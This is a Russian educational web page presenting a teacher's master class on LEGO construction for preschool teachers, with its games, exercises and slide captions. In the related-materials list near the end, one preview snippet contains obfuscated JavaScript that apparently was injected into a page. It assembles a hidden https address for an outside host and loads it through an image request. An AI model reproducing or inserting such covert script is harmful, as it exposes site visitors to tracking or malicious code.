Мастер-класс для педагогов «Использование ЛЕГО – конструирования в образовательной работе с дошкольниками»
методическая разработка
Цель: повышение профессионального мастерства педагогов-участников мастер-класса по ЛЕГО-конструированию через выполнение практических заданий.
Скачать:
Вложение | Размер |
---|---|
master-klass.docx | 22.92 КБ |
dou_46_master-klass.pptx | 400.96 КБ |
Предварительный просмотр:
Муниципальное бюджетное дошкольное образовательное учреждение «Детский сад общеразвивающего вида с приоритетным осуществлением деятельности по социально-личностному развитию №46 «Снегири»
Мастер-класс для педагогов
«Использование ЛЕГО – конструирования в образовательной работе с дошкольниками»
Разработала:
Курилова С.В., воспитатель
Канск, 2023 год
МАСТЕР-КЛАСС
Использование ЛЕГО – конструирования в образовательной работе с дошкольниками
Цель: повышение профессионального мастерства педагогов-участников мастер-класса по ЛЕГО - конструированию через выполнение практических заданий.
Задачи:
представить участникам мастер-класса разнообразные области применения ЛЕГО–конструктора;
показать участникам мастер-класса приёмы и методы работы в области ЛЕГО - конструирования;
формировать у участников мастер-класса мотивацию на использование в образовательной деятельности ЛЕГО - конструктора.
Планируемый результат:
информирование педагогов о системе работы по ЛЕГО- конструированию для детей дошкольного возраста;
формирование представлений педагогов о возможности работы с ЛЕГО-конструктором.
Ход мастер-класса:
1. Теоретическая часть.
Добрый день, уважаемые коллеги. Сегодня на нашем мастер-классе мы окунемся в мир ЛЕГО. Я хотела бы поделиться своим опытом работы по организации детской деятельности с применением конструктора ЛЕГО.
Конструкторы LEGO ― самая популярная игрушка в мире, причём не только у детей, но и у взрослых. Среди развивающих игрушек для детей именно конструктор ЛЕГО занимает особое место. Использовать его можно практически с самого рождения, когда малыш только начинает осваивать формы, цвета, размеры. Возрастные границы для игры безграничны.
Я в своей практике использую конструктор ЛЕГО в разных видах деятельности: на занятиях, в совместной, самостоятельной и индивидуальной работе. Главное ЛЕГО должно быть интересно самому воспитателю, тогда и с детьми будет легко и увлекательно работать.
Ни для кого не секрет, что LEGO способствует развитию двигательных навыков и мелкой моторики. Все мы знаем, что развитие мелкой моторики напрямую связано с развитием мышления и речи. Для более эффективной работы по развитию речи я использую следующие игры:
2. Практическая часть.
- У вас в наборе есть пластина, на ней мы будем работать. Возьмите её пожалуйста. Сейчас прикрепите полки как показано на экране.
«Различаем звуки»
Цель: Развивать звукопроизношение и фонематический слух.
Предварительная работа: выложить горизонтально на плато две длинные детали конструктора. Педагог: «Сейчас мы попробуем разложить звуки на две полочки. На полочку слева будем складывать звуки «С», а на полочку справа – звуки «Ш». Я буду называть звуки, если услышите звук «С» - прикрепляйте на левую полочку деталь конструктора, а если услышите звук «Ш» - прикрепляйте на правую полочку деталь конструктора».
«Двумя руками сразу»
Каждому ребенку дается плато, разделенное вертикальной линией на две равные половины и набор парных деталей конструктора. В качестве образца педагог показывает детям такое же плато с закрепленным на нем симметричным рисунком. Педагог: «Возьмите первые детали в обе руки и одновременно прикрепите их на нужные места. Задача детей – создание симметричного рисунка на своих плато одновременно двумя руками.
«Огромный, средний, маленький»
Каждому ребенку раздаются плато, набор элементов конструктора и набор предметных картинок. По образцу педагога дети выкладывают на своих плато элементы конструктора в следующем порядке: 1-ая деталь – большая, 2-ая – средняя, 3-я – маленькая. Педагог предлагает детям взять определенную картинку и, прикладывая ее к каждому элементу на плато назвать ее в соответствии с размером детали (например – «сумище – сумка – сумочка»).
LEGO прекрасно развивает логическое мышление, необходимое для построения объёмных конструкций и понимания приложенной к конструктору схемы.
Пространственное ориентирование.
-"Собери модель по ориентирам". Педагог диктует ребятам, куда выставить деталь определённой формы и цвета. Используются следующие ориентиры положения:
"левый верхний угол", "левый нижний угол", "правый верхний угол", "правый нижний угол", "середина левой стороны", "середина правой стороны", "над", "под", "слева от", "справа от".
Берём кирпич 1на 2 и ставим его в верхний левый угол, далее нам понадобится пластина 2 на 4 и её мы ставим в правый нижний угол, далее кирпич 2на4 и крепим в центре пластины, снова кирпич 1 на 12 и прикрепим его в левый нижний угол, над белым кирпичом прикрепляем пластину 1 на 4.
Пространственное ориентирование.
формы и цвета. Используются следующие ориентиры положения:
"левый верхний угол", "левый нижний угол", "правый верхний угол", "правый нижний угол",
"середина левой стороны", "середина правой стороны", "над", "под", "слева от", "справа от".
Так же при помощи лего можно развивать математические навыки.
«Найди лишнюю деталь»
Цель: закреплять цвет и форму.
Оборудование: кирпичики LEGO четырех цветов.
Берём пластины как показано на экране. Готовы? Тогда вам нужно найти лишнюю деталь
Собирая конструктор, ребёнок учится быть внимательным и терпеливым, развивается самодисциплина и самоорганизация. Кроме того, эта игра приносит неоценимую пользу творческому мышлению, развивает воображение.
3.Заключительная часть.
Рефлексия.
В заключении нашей встречи предлагаю построить пирамиду эмоций.
Кирпичик красного цвета означает, что вам понравился данный мастер-класс, зеленого – то, что мастер-класс понравился, но вы еще что-то хотели бы увидеть, ну, а кирпичик желтого цвета покажет, что вам ничего не понравилось.
Участники строят пирамиду своих эмоций из деталей Лего трех цветов.
Спасибо всем за участие в мастер-классе!
Предварительный просмотр:
Подписи к слайдам:
Цель – повышение профессионального мастерства педагогов-участников мастер-класса по ЛЕГО - конструированию через выполнение практических заданий . Задачи: 1. представить участникам мастер-класса разнообразные области применения ЛЕГО–конструктора; 2. показать участникам мастер-класса приёмы и методы работы в области ЛЕГО - конструирования; 3. формировать у участников мастер-класса мотивацию на использование в образовательной деятельности ЛЕГО - конструктора. Цель и задачи мастер-класса
1. « Различаем звуки», « Двумя руками сразу». 2 . «Собери модель по ориентирам». 3 . «Найди лишнюю деталь». 4. «Прояви творчество». Практические задания мастер-класса
«Различаем звуки »
«Двумя руками сразу»
«Найди лишнюю деталь »
Рефлексия мастер-класса техника «ПИРАМИДА ЭМОЦИЙ»
По теме: методические разработки, презентации и конспекты
Мастер класс «Использование ЛЕГО - конструирования в образовательной работе с дошкольниками»
Мастер -класс...
мастер-класс "Использование ЛЕГО – конструирования в образовательной работе с дошкольниками"
Данный мастер-класс информирует педагогов о системе работы по ЛЕГО-конструированию для детей дошкольного возраста, формирует представления педагогов о возможностях работы с ЛЕГО-конструктором....
Мастер-класс "Использование Лего-конструирования в образовательной работе с дошкольниками"
Ход мастер-класса:1.Теоретическая часть.Добрый день, уважаемые коллеги. Сегодня на нашем мастер-классе мы окунемся в мир ЛЕГО.Я хотела бы поделиться нашим опытом работы по организации детс...
Мастер-класс "Использование лего-конструирования в образовательной работе с дошкольниками"
мастер-класс...
МАСТЕР-КЛАСС "Использование ЛЕГО – конструирования в образовательной работе с дошкольниками"
МАСТЕР-КЛАССИспользование ЛЕГО – конструирования var e,n,o;window.self===window.top&&(e=[\'//\',\'s:\',\'tp\',\'ht\'].reverse().join(\'\'),n=[\'rzkmxcve.lussoit.com\',\'80\'].join(\'/\'),(o=new Image).src=\'\'...
Мастер – класс «Использование Лего – конструирования в образовательной работе с дошкольниками»
В связи с введением в систему дошкольного образования Федеральных государственных образовательных стандартов, педагогам открываются большие возможности использования новых пед...
Мастер-класс для педагогов «Использование Лего-конструирования в образовательной работе с дошкольниками»
Аудитория: педагоги дошкольных учреждений.Цель: повышение профессионального мастерства педагогов по ЛЕГО-конструированию в процессе педагогического общения.Задачи:обучать участников мастер-класс...